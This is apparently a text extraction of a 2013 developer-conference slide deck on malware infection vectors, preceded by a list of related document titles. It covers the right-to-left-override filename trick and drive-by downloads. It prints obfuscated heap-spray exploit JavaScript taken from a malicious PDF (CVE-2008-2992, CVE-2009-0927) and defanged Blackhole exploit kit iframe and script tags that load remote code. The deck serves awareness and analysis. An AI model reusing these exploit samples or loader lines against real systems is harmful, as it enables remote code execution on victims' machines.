Dr. Seltsam, oder wie ich lernte, Malware zu lieben



Similar documents
N J C C I C NJ CYBERSECURITY AND COMMUNICATIONS INTEGRATION CELL

Exploring the Black Hole Exploit Kit

RIA SECURITY TECHNOLOGY

CORPORATE AV / EPP COMPARATIVE ANALYSIS

Attacks on Clients: Dynamic Content & XSS

White Paper. No Signature Required: The Power of Emulation in Preventing Malware

Anti-exploit tools: The next wave of enterprise security

A more comprehensive version of this material was published in the October issue of the Virus Bulletin magazine [3].

(General purpose) Program security. What does it mean for a pgm to be secure? Depends whom you ask. Takes a long time to break its security controls.

Overview. Common Internet Threats. Spear Phishing / Whaling. Phishing Sites. Virus: Pentagon Attack. Viruses & Worms

2016 Trends in Cybersecurity: A Quick Guide to the Most Important Insights in Security

INTERNET & COMPUTER SECURITY March 20, Scoville Library. ccayne@biblio.org

CORPORATE AV / EPP COMPARATIVE ANALYSIS

PTSv2 in pills: The Best First for Beginners who want to become Penetration Testers. Self-paced, online, flexible access

WEB ATTACKS AND COUNTERMEASURES

Advancements in Botnet Attacks and Malware Distribution

Barracuda Intrusion Detection and Prevention System

Malware, Spyware, Adware, Viruses. Gracie White, Scott Black Information Technology Services

Web Application Worms & Browser Insecurity

Malware Trend Report, Q April May June

Optimized Mal-Ops Hack ad networks like a boss

JPX-LEI User Guide 2014/8/1. Japan Exchange Group, Inc. / Tokyo Stock Exchange, Inc. Copyright 2014 Tokyo Stock Exchange, Inc. All rights reserved.

THREAT VISIBILITY & VULNERABILITY ASSESSMENT

Windows Malware Annual Report 2014 And prognosis 2015

The Underground Economy of the Pay-Per-Install (PPI) Business

Sandy. The Malicious Exploit Analysis. Static Analysis and Dynamic exploit analysis. Garage4Hackers

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 2 Systems Threats and Risks

MALWARE THREATS AND TRENDS. Chris Blow, Director Dustin Hutchison, Director

Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them

Adventures in Cybercrime. Piotr Kijewski CERT Polska/NASK

How to easily clean an infected computer (Malware Removal Guide)

QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY

UNCLASSIFIED. Briefing to Critical Infrastructure Sector Organizations on the Canadian Cyber Incident Response Centre (CCIRC)

ASL IT SECURITY XTREME XPLOIT DEVELOPMENT

Botnets Die Hard Owned and Operated

Sophos Endpoint Security and Control Help

How To Protect Yourself From A Web Attack

4/20/2015. Fraud Watch Campaign. AARP is Fighting for You. AARP is Fighting for You. Campaign Tactics. AARP can help you Spot & Report Fraud

EyjafjallajöKull Framework (aka: Exploit Kits Krawler Framework)

Cyber Security Presentation Cyber Security Month Curtis McNay, Director of IT Security

Ten Tips to Avoid Viruses and Spyware

Endpoint Business Products Testing Report. Performed by AV-Test GmbH

Malware. Björn Victor 1 Feb [Based on Stallings&Brown]

Cloud Services Prevent Zero-day and Targeted Attacks

Sophos Endpoint Security and Control Help. Product version: 11

Blackhole Exploit Kit: A Spam Campaign, Not a Series of Individual Spam Runs AN IN-DEPTH ANALYSIS

(12) United States Patent

Uploaded images filter evasion for carrying out XSS attacks

Department of Computer & Information Sciences. INFO-450: Information Systems Security Syllabus

This page is left blank on purpose.

Avoiding Malware in Your Dental Practice. 10 Best Practices to Defend Your Data

FSOEP Web Banking & Fraud: Corporate Treasury Attacks

What Do You Mean My Cloud Data Isn t Secure?

TEST METHODOLOGY. Endpoint Protection Evasion and Exploit. v4.0

Common Cyber Threats. Common cyber threats include:

Malware Trend Report, Q October November December

WHITE PAPER: Cyber Crime and the Critical Need for Endpoint Security

Computer Protection. Computer Protection. Computer Protection 5/1/2013. Classic Battle of Good vs Evil. David Watterson & Ross Cavazos

SPAM, VIRUSES AND PHISHING, OH MY! Michael Starks, CISSP, CISA ISSA Fellow 10/08/2015

MALWARE ANALYSIS 1. STYX EXPLOIT PACK: INSIDIOUS DESIGN Aditya K. Sood & Richard J. Enbody Michigan State University, USA COMMUNICATION DESIGN

Cybercrime myths, challenges and how to protect our business. Vladimir Kantchev Managing Partner Service Centrix

System Compatibility. Enhancements. Operating Systems. Hardware Requirements. Security

What you need to know to keep your computer safe on the Internet

Security A to Z the most important terms

Cross-Site-Scripting (XSS)

BE SAFE ONLINE: Lesson Plan

Finding XSS in Real World

2015 TRUSTWAVE GLOBAL SECURITY REPORT

Web Security School Final Exam

Phishing by data URI

Spyware Doctor Enterprise Technical Data Sheet

Protection, Usability and Improvements in Reflected XSS Filters

Recommended Practice Case Study: Cross-Site Scripting. February 2007

MWR InfoSecurity Advisory. Interwoven Worksite ActiveX Control Remote Code Execution. 10 th March Contents

Don t Click That Link and other security tips. Laura Perry Jennifer Speegle Mike Trice

Threat Events: Software Attacks (cont.)

Countermeasures against Spyware

Client-side Web Engineering From HTML to AJAX

Integrated Protection for Systems. João Batista Territory Manager

Symantec Endpoint Protection

Computer Security DD2395

Transcription:

Dr. Seltsam, oder wie ich lernte, Malware zu lieben Matthias Schmidt schmidt@ieee.org

Quid est Malware? 2

Viruses Spyware Worms Adware Malware Rootkits Trojans Keyloggers Ransomware Dialers 06/05/13 3 Matthias Schmidt - Entwicklertag 2013

Malware why bother? 4

Personal Motivation 5

Although evil, Malware is usually Art 6

Business Motivation 7

Source: McAfee Threats Report, Second Quarter 2012, McAfee Labs 8

Source: McAfee Threats Report, Second Quarter 2012, McAfee Labs 9

And for anybody else, there is 10

MasterCard Latest AV Software $ 50 Update for 2 years $ 75 Loosing all your data Priceless 11

Infection - Classics 12

Email Attachment 13

Malicious URLs 14

Malicious Download 15

Infection Next Generation[TM] 16

Everybody loves images, right? 17

U+202e anyone? $ stat EmmaWatsonS<202e>gpj.exe File: `EmmaWatsonSgpj.exe' Size: 3 Blocks: 8 IO Block: 4096 regular file Device: 804h/2052d Inode: 9047185 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 1000/m) Gid: ( 1000/m) [ ] 18

U+202e: Unicode Character 'RIGHT-TO-LEFT OVERRIDE HTML Entity Windows UTF-32 C/C++/Java Python &#x202e Alt + 202E 0x0000202E "\u202e" u"\u202e" 19

Drive by Download 20

<iframe src="hxxp://tissot333.cn/eleonore/index.php" width="0" height="0" frameborder="0"> </iframe> 21

Custom exploit depending on the victim s environment 22

It s no longer necessary to click! 23

Java to the rescue Source: Oracle JDK Security Vulnerabilities, CVE Details, 2013 24

Did I mention Flash? Source: Adobe Flash Security Vulnerabilities, CVE Details, 2013 25

Embedded Malware 26

Source: Microsoft MSDN 28

We learned from the macro virus decade right? 29

One of the easiest and most powerful ways to customize PDF files is by using JavaScript [ ] JavaScript in Adobe Acrobat software implements objects, Unfortunately methods, and properties that enable not you to manipulate PDF files, produce database-driven PDF files, modify the appearance of PDF files, and much more. Source: https://www.adobe.com/devnet/acrobat/javascript.html 30

What could possibly go wrong? 31

Size: 12573 bytes Version: 1.6 Binary: True Linearized: False Encrypted: False Updates: 0 Objects: 9 Streams: 2 Comments: 0 Errors: 1 Version 0: Catalog: 21 Info: No Objects (9): [7, 21, 23, 24, 25, 26, 28, 60, 76] Streams (2): [26, 60] Encoded (2): [26, 60] Objects with JS code (1): [76] Suspicious elements: /AcroForm: [21] /Names: [21, 24] /JavaScript: [23, 25, 76] /JS: [25, 76] 32

x='e'; arr='13@62@[...]@73'; // Very looong line cc={q:'evt;s.&<kguavi2pm*"iw5rxya7gw6n/q9lqm% {DPN[@d>- e43k]"h,zu+j18fo :(b)cs_=}c0'}.q; q=x+'v'+'al'; a=(date+string).substr(2,3); aa=([].unshift+[].reverse).substr(2,3); if (aa==a){ t='3vtwe'; e=t['substr']; Object 76 w=e(12)[q]; s=[]; ar=arr.split('@'); n=cc; for(i=0;i<ar.length;i++){ s[i]=n[ar[i]]; } if(a===aa)w(s.join('')); } 33

if(e("1"))bjsg="%u8366%[ ]%u0000";function ezvr(ra,qy){while(ra.length*2<qy) {ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;} this.collabstore=collab.collectemailinfo({subj:"",msg:overflow});} function printf() {nop=unescape("%u0a0a%u0a0a%u0a0a%u0a0a");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0a0a %u0a0a");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray) {bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while (block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i+ +){mem[i]=block+heapblock;} var num=1299999999999999999988[ ]88;util.printf("%45000f",num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hwq500cn=payload.length*2;var qy=0x400000-(hwq500cn+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5ajk65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcqd96y=0;vqcqd96y<p5ajk65f;vqcqd96y++) {arry[vqcqd96y]=yarsp+payload;} var tumhnbgw=unescape("%09");while(tumhnbgw.length<0x4000) {tumhnbgw+=tumhnbgw;} tumhnbgw="n."+tumhnbgw;app.doc.collab.geticon(tumhnbgw);}} aplugins=app.plugins;var sv=parseint(app.viewerversion.tostring().charat(0));for(var i=0;i<aplugins.length;i++){if(aplugins[i].name=="escript"){var lv=aplugins[i].version;}} if((lv==9) ((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6) (sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1) (lv<=9.2) (lv>=8.13) (lv<=8.17)) {function a(){util.printd("p@111111111111111111111111 : yyyy111",new Date());}var h=app.plugins;for(var f=0;f<h.length;f++){if(h[f].name=="escript"){var i=h[f].version;}} if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape("%u9090%u9090");var e=unescape(bjsg);while(d.length<=0x8000) {d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++) {c[f]=d+e;}a();a();try{this.media.newplayer(null);}catch(e){}a();}} 34

[ ] aplugins = app.plugins; var sv = parseint(app.viewerversion.tostring().charat(0)); for (var i = 0; i < aplugins.length; i++) { if (aplugins[i].name == "EScript") { var lv = aplugins[i].version; } } [ ] if ((lv == 9) ((sv == 8) && (lv <= 8.12))) { geticon(); } else if (lv == 7.1) { printf(); } else if (((sv == 6) (sv == 7)) && (lv < 7.11)) { bx(); } else if ((lv >= 9.1) (lv <= 9.2) (lv >= 8.13) (lv <= 8.17)) { [ ] 35

function printf() { nop = unescape("%u0a0a%u0a0a%u0a0a%u0a0a"); var payload = unescape(bjsg); heapblock = nop + payload; bigblock = unescape("%u0a0a%u0a0a"); headersize = 20; spray = headersize + heapblock.length; while (bigblock.length < spray) { bigblock += bigblock; } [ ] util.printf("%45000f", num); } function geticon() { var arry = new Array(); if (app.doc.collab.geticon) { var payload = unescape(bjsg); var yarsp = unescape("%u9090%u9090"); yarsp = ezvr(yarsp, qy); var p5ajk65f = (0x0c0c0c0c - 0x400000) / 0x400000; [ ] for (var vqcqd96y = 0; vqcqd96y < p5ajk65f; vqcqd96y++) arry[vqcqd96y] = yarsp + payload; [ ] app.doc.collab.geticon(tumhnbgw); } CVE-2008-2992 Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability CVE-2009-0927 Adobe Acrobat and Reader Collab 'geticon()' JavaScript Method Remote Code Execution Vulnerability 36

Automagical[TM] Delivery 38

Linux/Cdorked.A 39

Features an IP address blacklist and reacts according to the victim s Internet browser s language 41

Cool EK Blackhole Nice Pack Exploit Kits Neutrino Whitehole Red Dot Sweet Orange 42

Features Lego Graphical User bricks Interface for evil Bot management Fully encrypted people communication Latest exploit updates Infos about installed AV software 43

Black Hole Celebrity of the Exploit Kits 44

Responsible for most web threats in 2012 Licenses: Annual license: $ 1500 First Half-year appeared license: $ on 1000Russian 3-month license: $ 700 underground forums During the term of the license all the updates are free. Up to date licensing policy Rent on our server: 1 week (7 full days): $ 200 2 weeks (14 full days): $ 300 3 weeks (21 full day): $ 400 4 weeks (31 full day): $ 500 Source: Inside a Black Hole, Gabor Szappanos, Principal Researcher, SophosLabs 46

Backhole - Infection 49

Victim receives a URL 50

Victim receives a URL and clicks on it 51

URL is redirected through intermediate sites 52

<script language= JavaScript type= text/javascript src= hxxp://www.grapevalleytours.com.au/ajaxam.js > </script> <script language= JavaScript type= text/javascript src= hxxp://www.womenetcetera.com/ajaxam.js > </script> <script language= JavaScript type= text/javascript src= hxxp://levillagesaintpaul.com/ccounter.js > </script> <script language= JavaScript type= text/javascript src= hxxp://fasttrialpayments.com/kquery.js > </script> 53

Blackhole server at the end of the chain 54

Format: http://{server}/{mainfile}? {threadid}={random hex digits} Example: hxxp://matocrossing.com/main.php? page=206133a43dda613f 55

Server delivers custom exploit code 56

57

Train/gain more awareness Remove/disable browser plugins Recommendations Don t forget the worst case 58

Thank you! 59

Q&A Matthias Schmidt schmidt@ieee.org @_xhr_ 60